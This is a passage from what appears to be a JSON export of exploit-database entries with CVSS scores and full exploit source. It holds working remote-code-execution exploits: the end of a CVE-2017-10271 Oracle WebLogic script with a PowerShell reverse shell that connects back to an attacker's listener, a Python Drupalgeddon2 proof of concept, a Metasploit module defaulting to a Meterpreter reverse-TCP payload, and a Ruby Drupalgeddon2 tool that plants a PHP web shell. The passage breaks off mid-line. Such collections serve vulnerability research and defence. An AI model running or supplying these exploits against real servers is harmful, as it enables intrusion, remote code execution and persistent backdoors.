r\"while (-not $d) {if 
($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\n )\n self.cmd_payload = escape(self.cmd_payload)\n\n def cmd_base(self):\n if self.target == 'win':\n return 'cmd'\n return '/bin/sh'\n\n def cmd_opt(self):\n if self.target == 'win':\n return '/c'\n return '-c'\n\n\n def get_generic_check_payload(self):\n random_uri = ''.join(\n choice(ascii_uppercase + ascii_lowercase + digits)\n for _ in range(16))\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <object id=\"url\" class=\"java.net.URL\">\n <string>http://{lhost}:{lport}/{random_uri}</string>\n </object>\n <object idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n\n return generic_check_payload.format(\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\n\n def get_process_builder_payload(self):\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>{cmd_base}</string>\n </void>\n <void 
index=\"1\">\n <string>{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>{cmd_payload}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\n cmd_payload=self.cmd_payload)\n\n def print_banner(self):\n print(\"=\" * 80)\n print(\"CVE-2017-10271 RCE Exploit\")\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\n print(\"Shell Listener: {lhost}:{lport}\".format(\n lhost=self.lhost, lport=self.lport))\n print(\"=\" * 80)\n\n def post_exploit(self, data):\n headers = {\n \"Content-Type\":\n \"text/xml;charset=UTF-8\",\n \"User-Agent\":\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\n }\n payload = \"/wls-wsat/CoordinatorPortType\"\n\n vulnurl = self.url + payload\n try:\n req = post(\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\n if self.check:\n print(\"[*] Did you get an HTTP GET request back?\")\n else:\n print(\"[*] Did you get a shell back?\")\n except Exception as e:\n print('[!] Connection Error')\n print(e)\n\n def run(self):\n self.print_banner()\n if self.check:\n print('[+] Generating generic check payload')\n payload = self.get_generic_check_payload()\n else:\n print('[+] Generating execution payload')\n payload = self.get_process_builder_payload()\n print('[*] Generated:')\n print(payload)\n if self.check:\n print('[+] Running generic check payload')\n else:\n print('[+] Running {target} execute payload').format(target=self.target)\n\n self.post_exploit(data=payload)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\n )\n parser.add_argument(\n '-l',\n '--lhost',\n required=True,\n dest='lhost',\n nargs='?',\n help='The listening host that the remote server should connect back to')\n parser.add_argument(\n '-p',\n '--lport',\n required=True,\n dest='lport',\n nargs='?',\n help='The listening port that the remote server should connect back to')\n parser.add_argument(\n '-r',\n '--rhost',\n required=True,\n dest='rhost',\n nargs='?',\n help='The remote host base URL that we should send the exploit to')\n parser.add_argument(\n '-c',\n '--check',\n dest='check',\n action='store_true',\n help=\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\n )\n parser.add_argument(\n '-w',\n '--win',\n dest='windows',\n action='store_true',\n help=\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\n )\n\n args = parser.parse_args()\n\n exploit = Exploit(\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\n windows=args.windows)\n exploit.run()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "title": "Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "href": "", "sourceData": "#!/usr/bin/env\nimport sys\nimport requests\n\nprint ('################################################################')\nprint ('# Proof-Of-Concept for CVE-2018-7600')\nprint ('# by Vitalii Rudnykh')\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\nprint ('# https://github.com/a2u/CVE-2018-7600')\nprint ('################################################################')\nprint ('Provided only for educational or information purposes\\n')\n\ntarget = input('Enter target url (example: https://domain.ltd/): ')\n\n# Add proxy support (eg. 
BURP to analyze HTTP(s) traffic)\n# set verify = False if your proxy certificate is self signed\n# remember to set proxies both for http and https\n# \n# example:\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n# verify = False\nproxies = {}\nverify = True\n\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\n\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\ncheck = requests.get(target + 'hello.txt')\nif check.status_code != 200:\n sys.exit(\"Not exploitable\")\nprint ('\\nCheck: '+target+'hello.txt')", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-17T00:00:00", "title": "Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "EXPLOITPACK:E563140BD918794B55F61FC55941120F", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n \n include Msf::Exploit::Remote::HttpClient\n \n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Drupalgeddon2',\n 'Description' => %q{\n CVE-2018-7600 / SA-CORE-2018-002\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\n allows remote attackers to execute arbitrary code because of an issue affecting\n multiple subsystems with default or common module configurations.\n\n The module can load msf PHP arch payloads, using the php/base64 encoder.\n\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Vitalii Rudnykh', # initial PoC\n 'Hans Topo', # further research and ruby port\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\n ],\n 'References' =>\n [\n ['SA-CORE', '2018-002'],\n ['CVE', '2018-7600'],\n ],\n 'DefaultOptions' =>\n {\n 'encoder' => 'php/base64',\n 'payload' => 'php/meterpreter/reverse_tcp',\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => [ARCH_PHP],\n 'Targets' =>\n [\n ['User register form with exec', {}],\n ],\n 'DisclosureDate' => 'Apr 15 2018',\n 'DefaultTarget' => 0\n ))\n \n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\n ])\n \n register_advanced_options(\n [\n\n ])\n end\n \n def uri_path\n normalize_uri(target_uri.path)\n end\n\n def exploit_user_register\n data = Rex::MIME::Message.new\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 
'form-data; name=\"mail[#markup]\"')\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\n post_data = data.to_s\n\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{uri_path}user/register\",\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data,\n 'vars_get' => {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => '1',\n '_wrapper_format' => 'drupal_ajax',\n }\n })\n end\n \n ##\n # Main\n ##\n \n def exploit\n case datastore['TARGET']\n when 0\n exploit_user_register\n else\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\n end\n end\n end", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "title": "Drupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 
"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "href": "", "sourceData": "#!/usr/bin/env ruby\n#\n# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/\n#\n# Authors:\n# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked\n# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k\n#\n\n\nrequire 'base64'\nrequire 'json'\nrequire 'net/http'\nrequire 'openssl'\nrequire 'readline'\nrequire 'highline/import'\n\n\n# Settings - Try to write a PHP to the web root?\ntry_phpshell = true\n# Settings - General/Stealth\n$useragent = \"drupalgeddon2\"\nwebshell = \"shell.php\"\n# Settings - Proxy information (nil to disable)\n$proxy_addr = nil\n$proxy_port = 8080\n\n\n# Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!)\nbashcmd = \"<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }\"\nbashcmd = \"echo \" + Base64.strict_encode64(bashcmd) + \" | base64 -d\"\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Function http_request <url> [type] [data]\ndef http_request(url, type=\"get\", payload=\"\", cookie=\"\")\n puts verbose(\"HTTP - URL : #{url}\") if $verbose\n puts verbose(\"HTTP - Type: #{type}\") if $verbose\n puts verbose(\"HTTP - Data: #{payload}\") if not payload.empty? and $verbose\n\n begin\n uri = URI(url)\n request = type =~ /get/? 
Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)\n request.initialize_http_header({\"User-Agent\" => $useragent})\n request.initialize_http_header(\"Cookie\" => cookie) if not cookie.empty?\n request.body = payload if not payload.empty?\n return $http.request(request)\n rescue SocketError\n puts error(\"Network connectivity issue\")\n rescue Errno::ECONNREFUSED => e\n puts error(\"The target is down ~ #{e.message}\")\n puts error(\"Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...\") if $proxy_addr\n rescue Timeout::Error => e\n puts error(\"The target timed out ~ #{e.message}\")\n end\n\n # If we got here, something went wrong.\n exit\nend\n\n\n# Function gen_evil_url <cmd> [method] [shell] [phpfunction]\ndef gen_evil_url(evil, element=\"\", shell=false, phpfunction=\"passthru\")\n puts info(\"Payload: #{evil}\") if not shell\n puts verbose(\"Element : #{element}\") if not shell and not element.empty? and $verbose\n puts verbose(\"PHP fn : #{phpfunction}\") if not shell and $verbose\n\n # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render\n # Check the version to match the payload\n if $drupalverion.start_with?(\"8\") and element == \"mail\"\n # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200\n url = $target + $clean_url + $form + \"?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpfunction + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\n\n elsif $drupalverion.start_with?(\"8\") and element == \"timezone\"\n # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru\n url = $target + $clean_url + $form + \"?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=\" + phpfunction + 
\"&timezone[a][#lazy_builder][][]=\" + evil\n\n #puts warning(\"WARNING: May benefit to use a PHP web shell\") if not try_phpshell and phpfunction != \"passthru\"\n\n elsif $drupalverion.start_with?(\"7\") and element == \"name\"\n # Method #3 - Drupal v7.x: name, #post_render - HTTP 200\n url = $target + \"#{$clean_url}#{$form}&name[%23post_render][]=\" + phpfunction + \"&name[%23type]=markup&name[%23markup]=\" + evil\n payload = \"form_id=user_pass&_triggering_element_name=name\"\n end\n\n # Drupal v7.x needs an extra value from a form\n if $drupalverion.start_with?(\"7\")\n response = http_request(url, \"post\", payload, $session_cookie)\n\n form_name = \"form_build_id\"\n puts verbose(\"Form name : #{form_name}\") if $verbose\n\n form_value = response.body.match(/input type=\"hidden\" name=\"#{form_name}\" value=\"(.*)\"/).to_s.slice(/value=\"(.*)\"/, 1).to_s.strip\n puts warning(\"WARNING: Didn't detect #{form_name}\") if form_value.empty?\n puts verbose(\"Form value : #{form_value}\") if $verbose\n\n url = $target + \"#{$clean_url}file/ajax/name/%23value/\" + form_value\n payload = \"#{form_name}=#{form_value}\"\n end\n\n return url, payload\nend\n\n\n# Function clean_result <input>\ndef clean_result(input)\n #result = JSON.pretty_generate(JSON[response.body])\n #result = $drupalverion.start_with?(\"8\")? 
JSON.parse(clean)[0][\"data\"] : clean\n clean = input.to_s.strip\n\n # PHP function: passthru\n # For: <payload>[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n clean.slice!(/\\[{\"command\":\".*}\\]$/)\n\n # PHP function: exec\n # For: [{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"<payload>\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n #clean.slice!(/\\[{\"command\":\".*data\":\"/)\n #clean.slice!(/\\\\u003Cspan class=\\\\u0022.*}\\]$/)\n\n # Newer PHP for an older Drupal\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\n #clean.slice!(/<b>.*<br \\/>/)\n\n # Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\n clean.slice!(/The website encountered an unexpected error.*/)\n\n return clean\nend\n\n\n# Feedback when something goes right\ndef success(text)\n # Green\n return \"\\e[#{32}m[+]\\e[0m #{text}\"\nend\n\n# Feedback when something goes wrong\ndef error(text)\n # Red\n return \"\\e[#{31}m[-]\\e[0m #{text}\"\nend\n\n# Feedback when something may have issues\ndef warning(text)\n # Yellow\n return \"\\e[#{33}m[!]\\e[0m #{text}\"\nend\n\n# Feedback when something doing something\ndef action(text)\n # Blue\n return \"\\e[#{34}m[*]\\e[0m #{text}\"\nend\n\n# Feedback with helpful information\ndef info(text)\n # Light blue\n return \"\\e[#{94}m[i]\\e[0m #{text}\"\nend\n\n# Feedback for the overkill\ndef verbose(text)\n # Dark grey\n return \"\\e[#{90}m[v]\\e[0m #{text}\"\nend\n\n\n# - - - - - - - - - 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef init_authentication()\n $uname = ask('Enter your username: ') { |q| q.echo = false }\n $passwd = ask('Enter your password: ') { |q| q.echo = false }\n $uname_field = ask('Enter the name of the username form field: ') { |q| q.echo = true }\n $passwd_field = ask('Enter the name of the password form field: ') { |q| q.echo = true }\n $login_path = ask('Enter your login path (e.g., user/login): ') { |q| q.echo = true }\n $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...): ') { |q| q.echo = true }\nend\n\ndef is_arg(args, param)\n args.each do |arg|\n if arg == param\n return true\n end\n end\n return false\nend\n\n\n# Quick how to use\ndef usage()\n puts 'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]'\n puts 'Example for target that does not require authentication:'\n puts ' ruby drupalgeddon2.rb https://example.com'\n puts 'Example for target that does require authentication:'\n puts ' ruby drupalgeddon2.rb https://example.com --authentication'\nend\n\n\n# Read in values\nif ARGV.empty?\n usage()\n exit\nend\n\n$target = ARGV[0]\ninit_authentication() if is_arg(ARGV, '--authentication')\n$verbose = is_arg(ARGV, '--verbose')\n\n\n# Check input for protocol\n$target = \"http://#{$target}\" if not $target.start_with?(\"http\")\n# Check input for the end\n$target += \"/\" if not $target.end_with?(\"/\")\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Banner\nputs action(\"--==[::#Drupalggedon2::]==--\")\nputs \"-\"*80\nputs info(\"Target : #{$target}\")\nputs info(\"Proxy : #{$proxy_addr}:#{$proxy_port}\") if $proxy_addr\nputs info(\"Write? 
: Skipping writing PHP web shell\") if not try_phpshell\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Setup connection\nuri = URI($target)\n$http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)\n\n# Use SSL/TLS if needed\nif uri.scheme == \"https\"\n $http.use_ssl = true\n $http.verify_mode = OpenSSL::SSL::VERIFY_NONE\nend\n\n$session_cookie = ''\n# If authentication required then login and get session cookie\nif $uname\n $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix\n response = http_request($target + $login_path, 'post', $payload, $session_cookie)\n if (response.code == '200' or response.code == '303') and not response.body.empty? and response['set-cookie']\n $session_cookie = response['set-cookie'].split('; ')[0]\n puts success(\"Logged in - Session Cookie : #{$session_cookie}\")\n end\n\nend\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Try and get version\n$drupalverion = \"\"\n\n# Possible URLs\nurl = [\n # --- changelog ---\n # Drupal v6.x / v7.x [200]\n $target + \"CHANGELOG.txt\",\n # Drupal v8.x [200]\n $target + \"core/CHANGELOG.txt\",\n\n # --- bootstrap ---\n # Drupal v7.x / v6.x [403]\n $target + \"includes/bootstrap.inc\",\n # Drupal v8.x [403]\n $target + \"core/includes/bootstrap.inc\",\n\n # --- database ---\n # Drupal v7.x / v6.x [403]\n $target + \"includes/database.inc\",\n # Drupal v7.x [403]\n #$target + \"includes/database/database.inc\",\n # Drupal v8.x [403]\n #$target + \"core/includes/database.inc\",\n\n # --- landing page ---\n # Drupal v8.x / v7.x [200]\n $target,\n]\n\n# Check all\nurl.each do|uri|\n # Check response\n response = http_request(uri, 'get', '', $session_cookie)\n\n # Check header\n if response['X-Generator'] and $drupalverion.empty?\n header = response['X-Generator'].slice(/Drupal (.*) \\(https:\\/\\/www.drupal.org\\)/, 1).to_s.strip\n\n if not 
header.empty?\n $drupalverion = \"#{header}.x\" if $drupalverion.empty?\n puts success(\"Header : v#{header} [X-Generator]\")\n puts verbose(\"X-Generator: #{response['X-Generator']}\") if $verbose\n end\n end\n\n # Check request response, valid\n if response.code == \"200\"\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\n\n # Check to see if it says: The requested URL \"http://<URL>\" was not found on this server.\n puts warning(\"WARNING: Could be a false-positive [1-1], as the file could be reported to be missing\") if response.body.downcase.include? \"was not found on this server\"\n\n # Check to see if it says: <h1 class=\"js-quickedit-page-title title page-title\">Page not found</h1> <div class=\"content\">The requested page could not be found.</div>\n puts warning(\"WARNING: Could be a false-positive [1-2], as the file could be reported to be missing\") if response.body.downcase.include? \"the requested page could not be found\"\n\n # Only works for CHANGELOG.txt\n if uri.match(/CHANGELOG.txt/)\n # Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x\n puts warning(\"WARNING: Unable to detect keyword 'drupal.org'\") if not response.body.downcase.include? \"drupal.org\"\n\n # Patched already? (For Drupal v8.4.x / v7.x)\n puts warning(\"WARNING: Might be patched! Found SA-CORE-2018-002: #{url}\") if response.body.include? 
\"SA-CORE-2018-002\"\n\n # Try and get version from the file contents (For Drupal v8.4.x / v7.x)\n $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip\n\n # Blank if not valid\n $drupalverion = \"\" if not $drupalverion[-1] =~ /\\d/\n end\n\n # Check meta tag\n if not response.body.empty?\n # For Drupal v8.x / v7.x\n meta = response.body.match(/<meta name=\"Generator\" content=\"Drupal (.*) /)\n metatag = meta.to_s.slice(/meta name=\"Generator\" content=\"Drupal (.*) \\(http/, 1).to_s.strip\n\n if not metatag.empty?\n $drupalverion = \"#{metatag}.x\" if $drupalverion.empty?\n puts success(\"Metatag: v#{$drupalverion} [Generator]\")\n puts verbose(meta.to_s) if $verbose\n end\n end\n\n # Done! ...if a full known version, else keep going... may get lucky later!\n break if not $drupalverion.end_with?(\"x\") and not $drupalverion.empty?\n end\n\n # Check request response, not allowed\n if response.code == \"403\" and $drupalverion.empty?\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\n\n if $drupalverion.empty?\n # Try and get version from the URL (For Drupal v.7.x/v6.x)\n $drupalverion = uri.match(/includes\\/database.inc/)? \"7.x/6.x\" : \"\" if $drupalverion.empty?\n # Try and get version from the URL (For Drupal v8.x)\n $drupalverion = uri.match(/core/)? \"8.x\" : \"\" if $drupalverion.empty?\n\n # If we got something, show it!\n puts success(\"URL : v#{$drupalverion}?\") if not $drupalverion.empty?\n end\n\n else\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts warning(\"MISSING: #{uri} (HTTP Response: #{response.code})#{tmp}\")\n end\nend\n\n\n# Feedback\nif not $drupalverion.empty?\n status = $drupalverion.end_with?(\"x\")? 
\"?\" : \"!\"\n puts success(\"Drupal#{status}: v#{$drupalverion}\")\nelse\n puts error(\"Didn't detect Drupal version\")\n exit\nend\n\nif not $drupalverion.start_with?(\"8\") and not $drupalverion.start_with?(\"7\")\n puts error(\"Unsupported Drupal version (#{$drupalverion})\")\n exit\nend\nputs \"-\"*80\n\n\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n\n# The attack vector to use\n$form = $drupalverion.start_with?(\"8\")? \"user/register\" : \"user/password\"\n\n# Make a request, check for form\nurl = \"#{$target}?q=#{$form}\"\nputs action(\"Testing: Form (#{$form})\")\nresponse = http_request(url, 'get', '', $session_cookie)\nif response.code == \"200\" and not response.body.empty?\n puts success(\"Result : Form valid\")\nelsif response['location']\n puts error(\"Target is NOT exploitable [5] (HTTP Response: #{response.code})... Could try following the redirect: #{response['location']}\")\n exit\nelsif response.code == \"404\"\n puts error(\"Target is NOT exploitable [4] (HTTP Response: #{response.code})... Form disabled?\")\n exit\nelsif response.code == \"403\"\n puts error(\"Target is NOT exploitable [3] (HTTP Response: #{response.code})... Form blocked?\")\n exit\nelsif response.body.empty?\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\n exit\nelse\n puts warning(\"WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})\")\nend\n\n\nputs \"- \"*40\n\n\n# Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register\n# Drupal v7.x needs it anyway\n$clean_url = $drupalverion.start_with?(\"8\")? 
